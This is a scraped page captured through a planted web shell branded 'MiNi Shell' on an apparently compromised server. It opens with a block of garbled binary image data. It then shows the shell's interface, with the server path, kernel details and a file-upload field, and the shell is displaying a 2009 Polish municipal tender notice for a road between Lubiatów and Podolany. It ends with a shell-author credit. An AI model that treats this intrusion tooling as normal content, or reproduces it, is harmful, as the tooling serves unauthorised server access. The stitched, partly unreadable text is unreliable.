JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090106/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090106/4531-N-2009.html

<p class="kh_header"><b>Złotoryja: Budowa drogi gminnej Lubiatów - Podolany</b><br>
<b>Numer ogłoszenia: 4531 - 2009; data zamieszczenia: 06.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Złotoryja , Aleja Miła 4, 59-500 Złotoryja, woj. dolnośląskie, tel. 076 8788700, faks 076 8788716.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotoryja.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa drogi gminnej Lubiatów - Podolany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia stanowi robota budowlana polegająca na: 
Budowie drogi gminnej nr 2037004, łączącej miejscowość Lubiatów z miejscowością Podolany, gmina Złotoryja, powiat Złotoryja, województwo dolnośląskie z wykorzystaniem kruszywa łamanego zapewnionego przez Zamawiającego . Kruszywo będzie do odbioru z PRZEDSIĘBIORSTWA GÓRNICZO-PRODUKCYJNEGO BAZALT Spółka Akcyjna w Wilkowie. </br>

lp. rozmiar rzeczowy ilość</br> 
1 długość całkowita drogi 1,855km</br> 
2 szerokość jezdni i poboczy 3,70m+ 2x1,00m</br> 
3 zjazdy do posesji, działki 21szt, </br>
4 zjazdy na drogi boczne 2szt </br>
5 powierzchnia nawierzchni asfaltowej 7446m2</br> 
6 powierzchnia podbudowy (m.tłucz.f 0-60/m.tłucz.0-40,miał) 8002m22546t,1358t,114t </br>
7 powierzchnia poboczy (odpad kamienny f 0-32mm) 3710m2 / 371m3 </br>
8 powierzchnia warstwy odsączającej grub. 25cm 2704m2</br> 
9 powierzchnia warstwy odsączającej grub. 10cm 5298m2 </br>
10 powierzchnia korytowania, gł. 0,30m 3012m2 </br>
11 powierzchnia profilowania (jezdnia i pobocza) 7774m2 
12 rozebranie nawierzchni bitumicznej 20m2 </br>
13 urobek do przewiezienia na składowisko 1010m3</br> 
14 płyty betonowe ażurowe 60x30cm 15m2</br> 
15 długość ścieku 50x50x15cm 125m</br> 
16 ława betonowa B-15 7m3</br> 
17 ława żwirowa 14m3</br> 
18 rury bet. śr.40cm/ ścianki betonowe 55m/14szt</br> 
19 rury bet. śr.50cm/ścianki betonowe 61m/18szt</br> 
20 rury bet. śr.60cm/ścianki betonowe 27m/8szt </br>
21 znaki pionowe, 16szt </br>
22 sączki tłuczniowe, dług. 1m 60szt </br>
23 wykop ręczny rowu 871m3 </br>
24 wykop mechaniczny rowu 483m3</br>.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 25000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia może ubiegać się Wykonawca, który: </br>
1) posiada uprawnienia do wykonywania działalności lub czynności objętych niniejszym zamówieniem;</br> 
2) posiada niezbędną wiedzę i doświadczenie, oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;</br> 
3) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;</br> 
4) nie podlega wykluczeniu z postępowania o udzielenie zamówienia.</br> 
2. Sposób dokonania oceny spełnienia wymaganych warunków: </br>
1) przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia;</br> 
2) niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania; ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania działalności lub czynności objętych niniejszym zamówieniem, oraz nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych1 (Dz. U. z 2007r. Nr 223, poz. 1655 ) wymagane są dokumenty i oświadczenia:</br> 
1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - potwierdzające uprawnienia do wykonywania działań lub czynności objętych niniejszym zamówieniem, wraz ze wskazaniem osób upoważnionych do dokonywania czynności prawnych w imieniu Wykonawcy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;</br> 
2) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p. - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;</br> 
3) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p. - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (jeżeli dotyczy);</br> 
4) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego, oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;</br> 
5) oświadczenie (z art. 22 ust. 1 pkt 1)-4)) sporządzone według wzoru stanowiącego załącznik nr 2 do niniejszej IDW; </br>
6) oświadczenie (z art. 24 ust. 1 i 2) sporządzone według wzoru stanowiącego załącznik nr 4 do niniejszej IDW; </br></br>



B. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie, oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, wymagane są dokumenty:</br> 
1) Wykaz (sporządzony według wzoru stanowiącego załącznik nr 7 do niniejszej IDW) wykonanych przez Wykonawcę robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia.</br>



W dalszej części niniejszej IDW zwrot ustawa Prawo zamówień publicznych będzie zastępowany przez Zamawiającego zwrotem u.p.z.p. zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. Jako zadanie porównywalne z przedmiotem zamówienia, Zamawiający rozumie realizację, drogi o wartości minimum 1 000 000,00 zł brutto (słownie: jeden milion złotych brutto); </br>
2) Wykaz (sporządzony wg wzoru stanowiącego załącznik nr 6 do niniejszej IDW) niezbędnych do wykonania niniejszego zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca; </br>
3) Wykaz osób i podmiotów (sporządzony według wzoru stanowiącego załącznik nr 5 do niniejszej IDW), które będą uczestniczyć w wykonywaniu zamówienia (podstawowy personel kierowniczy i techniczny), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez nich czynności, tj.: </br>

- do kierowania robotami budowlanymi w specjalności drogowej - 1 osoba,</br> 
- do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej - 1 osoba </br>
- do kierowania pracami geodezyjnymi - 1 osoba</br> 

4) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (dotyczy 
podstawowego personelu kierowniczego i technicznego wymienionego w pkt. 9.B.3), posiadają 
wymagane uprawnienia budowlane, przynależą do odpowiedniej izby inżynierów (aktualne 
zaświadczenie), oraz inne uprawnienia wymagane przepisami;</br> </br>

C. W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, wymagane są dokumenty: </br>
1) Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości, co najmniej 300 000 zł - wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; </br>
2) Polisa, lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z wykonaniem niniejszego zamówienia. </br></br>
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.1.A.1), pkt. 9.1.A.3) i pkt. 9.1.A.4) niniejszej IDW, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:</br> 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości; </br>
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że, uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; </br>
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.</br> 

3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 9.1.A.2) i pkt. 9.2. niniejszej IDW, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. </br>
4. Dokumenty, o których mowa w pkt. 9.1.A.1)-5), pkt. 9.1.B. i pkt. 9.1.C. niniejszej IDW są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. </br>

5. Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi uzasadnione wątpliwości, co do jej prawdziwości. </br>
6. Dokumenty, sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.</br>.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zlotoryja.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Złotoryja
Aleja Miła 4
59-500 Złotoryja.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2009 godzina 10:00, miejsce: Siedziba Zamawiającego:
Urząd Gminy Złotoryja
Aleja Miła 4
59-500 Złotoryja
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com